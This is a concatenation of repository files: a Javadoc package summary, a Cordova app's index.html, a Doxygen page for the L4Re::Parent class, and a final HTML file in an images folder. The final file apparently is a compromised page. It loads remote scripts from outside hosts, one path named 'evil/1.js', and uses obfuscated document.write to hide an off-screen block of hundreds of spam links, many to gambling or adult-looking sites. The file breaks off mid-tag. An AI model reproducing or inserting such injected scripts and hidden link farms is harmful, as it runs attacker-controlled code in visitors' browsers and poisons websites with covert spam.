jKMS.controller">ControllerHelper</a></td> <td class="colLast"> <div class="block">Some static help functions</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../jKMS/controller/EvaluationController.html" title="class in jKMS.controller">EvaluationController</a></td> <td class="colLast"> <div class="block">Everything round about Evaluation</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../jKMS/controller/ExceptionController.html" title="class in jKMS.controller">ExceptionController</a></td> <td class="colLast"> <div class="block">Controller for handling uncaught Exceptions</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../jKMS/controller/FileDownloadController.html" title="class in jKMS.controller">FileDownloadController</a></td> <td class="colLast"> <div class="block">Controller for downloading any files.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../jKMS/controller/LoadController.html" title="class in jKMS.controller">LoadController</a></td> <td class="colLast"> <div class="block">Class for game load/exclude/start</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../jKMS/controller/LoginController.html" title="class in jKMS.controller">LoginController</a></td> <td class="colLast"> <div class="block">Only one page to handle...</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../jKMS/controller/PlayController.html" title="class in jKMS.controller">PlayController</a></td> <td class="colLast">&nbsp;</td> </tr> <tr class="altColor"> <td class="colFirst"><a href="../../jKMS/controller/PrepareController.html" title="class in jKMS.controller">PrepareController</a></td> <td class="colLast"> <div class="block">Class for all preparing game functions</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><a href="../../jKMS/controller/ServerController.html" title="class in jKMS.controller">ServerController</a></td> <td class="colLast"> <div class="block">Class for non categorizable server side requests</div> </td> </tr> </tbody> </table> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../overview-summary.html">Overview</a></li> <li class="navBarCell1Rev">Package</li> <li>Class</li> <li><a href="package-use.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../deprecated-list.html">Deprecated</a></li> <li><a href="../../index-files/index-1.html">Index</a></li> <li><a href="../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../jKMS/cards/package-summary.html">Prev Package</a></li> <li><a href="../../jKMS/exceptionHelper/package-summary.html">Next Package</a></li> </ul> <ul class="navList"> <li><a href="../../index.html?jKMS/controller/package-summary.html" target="_top">Frames</a></li> <li><a href="package-summary.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
knockoutphonegap/www/index.html
henriquecampos/knockoutphonegap
<!DOCTYPE html> <html data-ng-app="AngularAuthApp"> <head> <meta charset="utf-8" /> <!-- Customize the content security policy in the meta tag below as needed. Add 'unsafe-inline' to default-src to enable inline JavaScript. For details, see http://go.microsoft.com/fwlink/?LinkID=617521 --> <meta http-equiv="Content-Security-Policy" content="default-src 'self' data: gap: https://ssl.gstatic.com 'unsafe-eval'; style-src 'self' 'unsafe-inline'; media-src *"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <title>Contratos</title> <!-- knockoutphonegap references --> <link href="css/bootstrap.min.css" rel="stylesheet" /> </head> <body> <div class="container"> <div data-ng-view=""> </div> </div> <!-- Cordova reference, this is added to your app when it's built. --> <script src="cordova.js"></script> <script src="scripts/platformOverrides.js"></script> <!-- Angular JS --> <script src="scripts/frameworks/angular.min.js"></script> <!--<script src="scripts/frameworks/angular-resource.min.js"></script>--> <script src="scripts/frameworks/angular-route.min.js"></script> <!-- Initialize all the modules --> <script src="scripts/index.js"></script> <!-- Services --> <!--<script src="scripts/services/localStorage.js"></script> <script src="scripts/services/storage.js"></script>--> <script src="scripts/services/authInterceptorService.js"></script> <script src="scripts/services/authService.js"></script> <script src="scripts/services/contratosService.js"></script> <script src="scripts/services/localStorage.js"></script> <!-- Directives --> <!--<script src="scripts/directives/textChange.js"></script>--> <!-- Controllers --> <script src="scripts/controllers/homeController.js"></script> <script src="scripts/controllers/loginController.js"></script> <script src="scripts/controllers/contratosController.js"></script> </body> </html>
doc/source/html/classL4Re_1_1Parent.html
MicroTrustRepos/microkernel
<html> <head> <title>L4Re Reference Manual</title> <link href="doxygen.css" rel="stylesheet" type="text/css"> <link href="tabs.css" rel="stylesheet" type="text/css"> </HEAD> <body style="background: #fff url(header-bg.png) repeat-x scroll 0 0"> <div> <div style="text-align: center; margin-bottom: 10px; border-width: 0 0 1px 0; border-color: #000; border-style: solid"> L4Re - L4 Runtime Environment </div> <!-- Generated by Doxygen 1.7.1 --> <script type="text/javascript"> function hasClass(ele,cls) { return ele.className.match(new RegExp('(\\s|^)'+cls+'(\\s|$)')); } function addClass(ele,cls) { if (!this.hasClass(ele,cls)) ele.className += " "+cls; } function removeClass(ele,cls) { if (hasClass(ele,cls)) { var reg = new RegExp('(\\s|^)'+cls+'(\\s|$)'); ele.className=ele.className.replace(reg,' '); } } function toggleVisibility(linkObj) { var base = linkObj.getAttribute('id'); var summary = document.getElementById(base + '-summary'); var content = document.getElementById(base + '-content'); var trigger = document.getElementById(base + '-trigger'); if ( hasClass(linkObj,'closed') ) { summary.style.display = 'none'; content.style.display = 'block'; trigger.src = 'open.png'; removeClass(linkObj,'closed'); addClass(linkObj,'opened'); } else if ( hasClass(linkObj,'opened') ) { summary.style.display = 'block'; content.style.display = 'none'; trigger.src = 'closed.png'; removeClass(linkObj,'opened'); addClass(linkObj,'closed'); } return false; } </script> <div class="navigation" id="top"> <div class="tabs"> <ul class="tablist"> <li><a href="main.html"><span>Main&nbsp;Page</span></a></li> <li><a href="pages.html"><span>Related&nbsp;Pages</span></a></li> <li><a href="modules.html"><span>Modules</span></a></li> <li><a href="namespaces.html"><span>Namespaces</span></a></li> <li class="current"><a href="annotated.html"><span>Data&nbsp;Structures</span></a></li> <li><a href="files.html"><span>Files</span></a></li> <li><a href="examples.html"><span>Examples</span></a></li> </ul> </div> <div class="tabs2"> <ul class="tablist"> <li><a href="annotated.html"><span>Data&nbsp;Structures</span></a></li> <li><a href="classes.html"><span>Data&nbsp;Structure&nbsp;Index</span></a></li> <li><a href="hierarchy.html"><span>Class&nbsp;Hierarchy</span></a></li> <li><a href="functions.html"><span>Data&nbsp;Fields</span></a></li> </ul> </div> <div class="navpath"> <ul> <li><a class="el" href="namespaceL4Re.html">L4Re</a> </li> <li><a class="el" href="classL4Re_1_1Parent.html">L4Re::Parent</a> </li> </ul> </div> </div> <div class="header"> <div class="summary"> <a href="#pub-methods">Public Member Functions</a> </div> <div class="headertitle"> <h1>L4Re::Parent Class Reference<br/> <small> [<a class="el" href="group__api__l4re__parent.html">Parent API</a>]</small> </h1> </div> </div> <div class="contents"> <!-- doxytag: class="L4Re::Parent" --><!-- doxytag: inherits="Kobject_t&lt; Parent, L4::Kobject, L4Re::Protocol::Parent &gt;" --> <p><a class="el" href="classL4Re_1_1Parent.html" title="Parent interface.">Parent</a> interface. <a href="#_details">More...</a></p> <div id="dynsection-0" onclick="return toggleVisibility(this)" class="dynheader closed" style="cursor:pointer;"> <img id="dynsection-0-trigger" src="closed.png"/> Inheritance diagram for L4Re::Parent:</div> <div id="dynsection-0-summary" class="dynsummary" style="display:block;"> </div> <div id="dynsection-0-content" class="dyncontent" style="display:none;"> <div class="center"><img src="classL4Re_1_1Parent__inherit__graph.png" border="0" usemap="#L4Re_1_1Parent_inherit__map" alt="Inheritance graph"/></div> <map name="L4Re_1_1Parent_inherit__map" id="L4Re_1_1Parent_inherit__map"> <area shape="rect" id="node2" href="classL4_1_1Kobject__t.html" title="{L4::Kobject_t\&lt; Parent, L4::Kobject, L4Re::Protocol::Parent \&gt;\n|+ Protocol\l|}" alt="" coords="5,257,376,346"/><area shape="rect" id="node4" href="classL4_1_1Kobject.html" title="Base class for all kinds of kernel objects, referred to by capabilities." alt="" coords="39,6,140,189"/><area shape="rect" id="node6" href="classL4_1_1Kobject__t.html" title="Helper class to create an L4Re interface class that is derived from a single base class..." alt="" coords="164,53,420,142"/></map> <center><span class="legend">[<a target="top" href="graph_legend.html">legend</a>]</span></center></div> <div id="dynsection-1" onclick="return toggleVisibility(this)" class="dynheader closed" style="cursor:pointer;"> <img id="dynsection-1-trigger" src="closed.png"/> Collaboration diagram for L4Re::Parent:</div> <div id="dynsection-1-summary" class="dynsummary" style="display:block;"> </div> <div id="dynsection-1-content" class="dyncontent" style="display:none;"> <div class="center"><img src="classL4Re_1_1Parent__coll__graph.png" border="0" usemap="#L4Re_1_1Parent_coll__map" alt="Collaboration graph"/></div> <map name="L4Re_1_1Parent_coll__map" id="L4Re_1_1Parent_coll__map"> <area shape="rect" id="node2" href="classL4_1_1Kobject__t.html" title="{L4::Kobject_t\&lt; Parent, L4::Kobject, L4Re::Protocol::Parent \&gt;\n|+ Protocol\l|}" alt="" coords="5,257,376,346"/><area shape="rect" id="node4" href="classL4_1_1Kobject.html" title="Base class for all kinds of kernel objects, referred to by capabilities." alt="" coords="39,6,140,189"/><area shape="rect" id="node6" href="classL4_1_1Kobject__t.html" title="Helper class to create an L4Re interface class that is derived from a single base class..." alt="" coords="164,53,420,142"/></map> <center><span class="legend">[<a target="top" href="graph_legend.html">legend</a>]</span></center></div> <table class="memberdecls"> <tr><td colspan="2"><h2><a name="pub-methods"></a> Public Member Functions</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">long&nbsp;</td><td class="memItemRight" valign="bottom"><a class="el" href="classL4Re_1_1Parent.html#ada96c4b06045d4eafcd39111293b3fed">signal</a> (unsigned long sig, unsigned long val) const throw ()</td></tr> <tr><td class="mdescLeft">&nbsp;</td><td class="mdescRight">Send a signal to the parent. <a href="#ada96c4b06045d4eafcd39111293b3fed"></a><br/></td></tr> </table> <hr/><a name="_details"></a><h2>Detailed Description</h2> <p><a class="el" href="classL4Re_1_1Parent.html" title="Parent interface.">Parent</a> interface. </p> <dl class="see"><dt><b>See also:</b></dt><dd><a class="el" href="group__api__l4re__parent.html">Parent API </a> for more details about the purpose. </dd></dl> <p>Definition at line <a class="el" href="parent_source.html#l00050">50</a> of file <a class="el" href="parent_source.html">parent</a>.</p> <hr/><h2>Member Function Documentation</h2> <a class="anchor" id="ada96c4b06045d4eafcd39111293b3fed"></a><!-- doxytag: member="L4Re::Parent::signal" ref="ada96c4b06045d4eafcd39111293b3fed" args="(unsigned long sig, unsigned long val) const " --> <div class="memitem"> <div class="memproto"> <table class="memname"> <tr> <td class="memname">long L4Re::Parent::signal </td> <td>(</td> <td class="paramtype">unsigned long&nbsp;</td> <td class="paramname"> <em>sig</em>, </td> </tr> <tr> <td class="paramkey"></td> <td></td> <td class="paramtype">unsigned long&nbsp;</td> <td class="paramname"> <em>val</em></td><td>&nbsp;</td> </tr> <tr> <td></td> <td>)</td> <td></td><td></td><td> const throw ()</td> </tr> </table> </div> <div class="memdoc"> <p>Send a signal to the parent. </p> <dl><dt><b>Parameters:</b></dt><dd> <table border="0" cellspacing="2" cellpadding="0"> <tr><td valign="top"></td><td valign="top"><em>sig</em>&nbsp;</td><td>Signal to send </td></tr> <tr><td valign="top"></td><td valign="top"><em>val</em>&nbsp;</td><td>Value of the signal</td></tr> </table> </dd> </dl> <dl class="return"><dt><b>Returns:</b></dt><dd>0 on success, &lt;0 on error<ul> <li>-<a class="el" href="group__l4__error__api.html#ggab4c8abc71ffa221a25c1ca5840a354f9a680679fbebc1e0ac1f9ec607c43319e0" title="No reply.">L4_ENOREPLY</a></li> <li>IPC errors </li> </ul> </dd></dl> </div> </div> <hr/>The documentation for this class was generated from the following file:<ul> <li>l4/re/<a class="el" href="parent_source.html">parent</a></li> </ul> </div> <div style="background-color: #fff; border-width: 1px 0 0 0; border-color: #000; border-style: solid; text-align: center; margin-top: 10px"> L4Re - L4 Runtime Environment </div> </div> </body> </html>
images/Chershire/02022116753ij.html
ForAEdesWeb/AEW2
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a> <a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a> <a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a> <a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a> <a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a> <a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a> <a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a> <a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a> <a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a> <a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a> <a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a> <a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a> <a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a> <a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a> <a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a> <a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a> <a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a> <a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a> <a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a> <a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a> <a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a> <a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a> <a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a> <a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a> <a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a> <a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a> <a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a> <a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a> <a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a> <a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a> <a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a> <a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a> <a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a> <a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a> <a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a> <a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a> <a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a> <a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a> <a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a> <a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a> <a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a> <a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a> <a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a> <a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a> <a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a> <a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a> <a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a> <a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a> <a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a> <a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a> <a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a> <a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a> <a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a> <a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a> <a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a> <a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a> <a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a> <a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a> <a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a> <a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a> <a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a> <a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a> <a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a> <a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a> <a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a> <a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a> <a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a> <a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a> <a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a> <a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a> <a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a> <a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a> <a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a> <a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a> <a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a> <a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a> <a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a> <a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a> <a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a> <a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a> <a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a> <a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a> <a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a> <a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a> <a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a> <a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a> <a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a> <a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a> <a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a> <a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a> <a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a> <a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a> <a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a> <a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a> <a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a> <a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a> <a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a> <a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a> <a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a> <a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a> <a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a> <a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a> <a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a> <a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a> <a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a> <a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a> <a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a> <a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a> <a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a> <a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a> <a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a> <a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a> <a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a> <a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a> <a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a> <a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a> <a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a> <a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a> <a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a> <a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a> <a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a> <a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a> <a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a> <a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a> <a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a> <a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a> <a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a> <a class="z7z8z9z6" href="http://www.mcnmocom.top/">http://www.mcnmocom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqiuxia88com.top/">http://www.wwwqiuxia88com.top/</a> <a class="z7z8z9z6" href="http://www.www5253com.top/">http://www.www5253com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhaichuanwaiyucom.top/">http://www.wwwhaichuanwaiyucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwulunarcn.top/">http://www.wwwulunarcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwvideo6868com.top/">http://www.wwwvideo6868com.top/</a> <a class="z7z8z9z6" href="http://www.wwwythmbxgcom.top/">http://www.wwwythmbxgcom.top/</a> <a class="z7z8z9z6" href="http://www.gakaycom.top/">http://www.gakaycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwhf1zcom.top/">http://www.wwwhf1zcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwkrd17net.top/">http://www.wwwkrd17net.top/</a> <a class="z7z8z9z6" href="http://www.qqav4444net.top/">http://www.qqav4444net.top/</a> <a class="z7z8z9z6" href="http://www.www5a78com.top/">http://www.www5a78com.top/</a> <a class="z7z8z9z6" href="http://www.hztuokuncom.top/">http://www.hztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqqqav7979net.top/">http://www.wwwqqqav7979net.top/</a> <a class="z7z8z9z6" 